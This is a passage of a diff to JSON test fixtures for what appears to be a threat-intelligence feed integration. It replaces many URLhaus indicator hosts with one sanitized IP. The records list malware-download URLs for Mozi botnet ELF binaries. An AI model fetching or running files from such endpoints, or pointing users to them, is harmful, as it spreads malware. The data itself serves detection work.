UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025583700Z", + "original": "{\"id\":\"961394\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961394/\",\"url\":\"http://89.160.20.156:36828/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7289,18 +7289,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://202.111.130.185:55281/Mozi.m", + "original": "http://89.160.20.156:55281/Mozi.m", "scheme": "http", "port": 55281, - "domain": "202.111.130.185", - "full": "http://202.111.130.185:55281/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55281/Mozi.m" }, - "ip": "202.111.130.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693066836Z", - "original": "{\"id\":\"961395\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961395/\",\"url\":\"http://202.111.130.185:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"202.111.130.185\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025590600Z", + "original": "{\"id\":\"961395\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961395/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7338,18 +7338,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.102.83.85:49772/Mozi.m", + "original": "http://89.160.20.156:49772/Mozi.m", "scheme": "http", "port": 49772, - "domain": "119.102.83.85", - "full": "http://119.102.83.85:49772/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49772/Mozi.m" }, - "ip": "119.102.83.85" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693070613Z", - "original": "{\"id\":\"961396\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961396/\",\"url\":\"http://119.102.83.85:49772/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.102.83.85\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025599800Z", + "original": "{\"id\":\"961396\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961396/\",\"url\":\"http://89.160.20.156:49772/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7387,18 +7387,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.165.246:50229/Mozi.m", + "original": "http://89.160.20.156:50229/Mozi.m", "scheme": "http", "port": 50229, - "domain": "117.222.165.246", - "full": "http://117.222.165.246:50229/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50229/Mozi.m" }, - "ip": "117.222.165.246" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693073879Z", - "original": "{\"id\":\"961391\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961391/\",\"url\":\"http://117.222.165.246:50229/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.165.246\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025607300Z", + "original": "{\"id\":\"961391\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961391/\",\"url\":\"http://89.160.20.156:50229/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7436,18 +7436,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.170.34:39996/Mozi.m", + "original": "http://89.160.20.156:39996/Mozi.m", "scheme": "http", "port": 39996, - "domain": "117.222.170.34", - "full": "http://117.222.170.34:39996/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39996/Mozi.m" }, - "ip": "117.222.170.34" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693077666Z", - "original": "{\"id\":\"961392\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961392/\",\"url\":\"http://117.222.170.34:39996/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.222.170.34\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025614200Z", + "original": "{\"id\":\"961392\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961392/\",\"url\":\"http://89.160.20.156:39996/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7485,18 +7485,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://113.239.210.87:50195/Mozi.a", + "original": "http://89.160.20.156:50195/Mozi.a", "scheme": "http", "port": 50195, - "domain": "113.239.210.87", - "full": "http://113.239.210.87:50195/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50195/Mozi.a" }, - "ip": "113.239.210.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693081043Z", - "original": "{\"id\":\"961387\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961387/\",\"url\":\"http://113.239.210.87:50195/Mozi.a\",\"url_status\":\"online\",\"host\":\"113.239.210.87\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025621100Z", + "original": "{\"id\":\"961387\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961387/\",\"url\":\"http://89.160.20.156:50195/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7534,18 +7534,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.62.159.229:52447/Mozi.a", + "original": "http://89.160.20.156:52447/Mozi.a", "scheme": "http", "port": 52447, - "domain": "115.62.159.229", - "full": "http://115.62.159.229:52447/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52447/Mozi.a" }, - "ip": "115.62.159.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693084229Z", - "original": "{\"id\":\"961388\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961388/\",\"url\":\"http://115.62.159.229:52447/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.62.159.229\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025628Z", + "original": "{\"id\":\"961388\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961388/\",\"url\":\"http://89.160.20.156:52447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7583,18 +7583,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.90.237.126:56321/Mozi.m", + "original": "http://89.160.20.156:56321/Mozi.m", "scheme": "http", "port": 56321, - "domain": "113.90.237.126", - "full": "http://113.90.237.126:56321/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56321/Mozi.m" }, - "ip": "113.90.237.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693087314Z", - "original": "{\"id\":\"961389\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961389/\",\"url\":\"http://113.90.237.126:56321/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.90.237.126\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025634900Z", + "original": "{\"id\":\"961389\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961389/\",\"url\":\"http://89.160.20.156:56321/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7632,18 +7632,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.219.146.151:54620/Mozi.m", + "original": "http://89.160.20.156:54620/Mozi.m", "scheme": "http", "port": 54620, - "domain": "115.219.146.151", - "full": "http://115.219.146.151:54620/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54620/Mozi.m" }, - "ip": "115.219.146.151" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693090480Z", - "original": "{\"id\":\"961390\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961390/\",\"url\":\"http://115.219.146.151:54620/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.219.146.151\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025641700Z", + "original": "{\"id\":\"961390\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961390/\",\"url\":\"http://89.160.20.156:54620/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7681,18 +7681,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://60.7.65.79:52064/Mozi.a", + "original": "http://89.160.20.156:52064/Mozi.a", "scheme": "http", "port": 52064, - "domain": "60.7.65.79", - "full": "http://60.7.65.79:52064/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52064/Mozi.a" }, - "ip": "60.7.65.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693093726Z", - "original": "{\"id\":\"961386\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961386/\",\"url\":\"http://60.7.65.79:52064/Mozi.a\",\"url_status\":\"online\",\"host\":\"60.7.65.79\",\"date_added\":\"2021-01-14 20:23:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025648600Z", + "original": "{\"id\":\"961386\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961386/\",\"url\":\"http://89.160.20.156:52064/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:23:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7730,18 +7730,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.16.88:47401/Mozi.m", + "original": "http://89.160.20.156:47401/Mozi.m", "scheme": "http", "port": 47401, - "domain": "59.93.16.88", - "full": "http://59.93.16.88:47401/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47401/Mozi.m" }, - "ip": "59.93.16.88" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693097113Z", - "original": "{\"id\":\"961385\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961385/\",\"url\":\"http://59.93.16.88:47401/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.16.88\",\"date_added\":\"2021-01-14 20:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025655300Z", + "original": "{\"id\":\"961385\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961385/\",\"url\":\"http://89.160.20.156:47401/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7779,18 +7779,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.95.174.61:46527/Mozi.m", + "original": "http://89.160.20.156:46527/Mozi.m", "scheme": "http", "port": 46527, - "domain": "59.95.174.61", - "full": "http://59.95.174.61:46527/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46527/Mozi.m" }, - "ip": "59.95.174.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693100860Z", - "original": "{\"id\":\"961382\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961382/\",\"url\":\"http://59.95.174.61:46527/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.95.174.61\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025662500Z", + "original": "{\"id\":\"961382\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961382/\",\"url\":\"http://89.160.20.156:46527/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7828,18 +7828,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.21.239:38132/Mozi.m", + "original": "http://89.160.20.156:38132/Mozi.m", "scheme": "http", "port": 38132, - "domain": "59.93.21.239", - "full": "http://59.93.21.239:38132/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38132/Mozi.m" }, - "ip": "59.93.21.239" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693104316Z", - "original": "{\"id\":\"961383\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961383/\",\"url\":\"http://59.93.21.239:38132/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.21.239\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025669400Z", + "original": "{\"id\":\"961383\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961383/\",\"url\":\"http://89.160.20.156:38132/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7877,18 +7877,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://45.176.111.252:59015/Mozi.m", + "original": "http://89.160.20.156:59015/Mozi.m", "scheme": "http", "port": 59015, - "domain": "45.176.111.252", - "full": "http://45.176.111.252:59015/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59015/Mozi.m" }, - "ip": "45.176.111.252" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693107663Z", - "original": "{\"id\":\"961384\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961384/\",\"url\":\"http://45.176.111.252:59015/Mozi.m\",\"url_status\":\"online\",\"host\":\"45.176.111.252\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025676600Z", + "original": "{\"id\":\"961384\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961384/\",\"url\":\"http://89.160.20.156:59015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7926,18 +7926,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.176.198:59454/Mozi.m", + "original": "http://89.160.20.156:59454/Mozi.m", "scheme": "http", "port": 59454, - "domain": "222.137.176.198", - "full": "http://222.137.176.198:59454/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59454/Mozi.m" }, - "ip": "222.137.176.198" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693110979Z", - "original": "{\"id\":\"961379\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961379/\",\"url\":\"http://222.137.176.198:59454/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.176.198\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025683400Z", + "original": "{\"id\":\"961379\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961379/\",\"url\":\"http://89.160.20.156:59454/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7975,18 +7975,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.232.233.146:37883/Mozi.m", + "original": "http://89.160.20.156:37883/Mozi.m", "scheme": "http", "port": 37883, - "domain": "42.232.233.146", - "full": "http://42.232.233.146:37883/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37883/Mozi.m" }, - "ip": "42.232.233.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693114205Z", - "original": "{\"id\":\"961380\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961380/\",\"url\":\"http://42.232.233.146:37883/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.232.233.146\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025690300Z", + "original": "{\"id\":\"961380\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961380/\",\"url\":\"http://89.160.20.156:37883/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8024,18 +8024,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.234.255.164:55209/Mozi.m", + "original": "http://89.160.20.156:55209/Mozi.m", "scheme": "http", "port": 55209, - "domain": "42.234.255.164", - "full": "http://42.234.255.164:55209/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55209/Mozi.m" }, - "ip": "42.234.255.164" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693117341Z", - "original": "{\"id\":\"961381\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961381/\",\"url\":\"http://42.234.255.164:55209/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.234.255.164\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025698700Z", + "original": "{\"id\":\"961381\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961381/\",\"url\":\"http://89.160.20.156:55209/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8073,18 +8073,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.59.96.114:41062/Mozi.m", + "original": "http://89.160.20.156:41062/Mozi.m", "scheme": "http", "port": 41062, - "domain": "182.59.96.114", - "full": "http://182.59.96.114:41062/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41062/Mozi.m" }, - "ip": "182.59.96.114" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693120397Z", - "original": "{\"id\":\"961378\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961378/\",\"url\":\"http://182.59.96.114:41062/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.59.96.114\",\"date_added\":\"2021-01-14 20:21:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025705900Z", + "original": "{\"id\":\"961378\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961378/\",\"url\":\"http://89.160.20.156:41062/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8122,18 +8122,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://211.226.185.30:60380/i", + "original": "http://89.160.20.156:60380/i", "scheme": "http", "port": 60380, - "domain": "211.226.185.30", - "full": "http://211.226.185.30:60380/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60380/i" }, - "ip": "211.226.185.30" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693124103Z", - "original": "{\"id\":\"961377\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961377/\",\"url\":\"http://211.226.185.30:60380/i\",\"url_status\":\"online\",\"host\":\"211.226.185.30\",\"date_added\":\"2021-01-14 20:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.025712700Z", + "original": "{\"id\":\"961377\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961377/\",\"url\":\"http://89.160.20.156:60380/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8171,18 +8171,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://195.87.190.106:54796/Mozi.m", + "original": "http://89.160.20.156:54796/Mozi.m", "scheme": "http", "port": 54796, - "domain": "195.87.190.106", - "full": "http://195.87.190.106:54796/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54796/Mozi.m" }, - "ip": "195.87.190.106" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693127340Z", - "original": 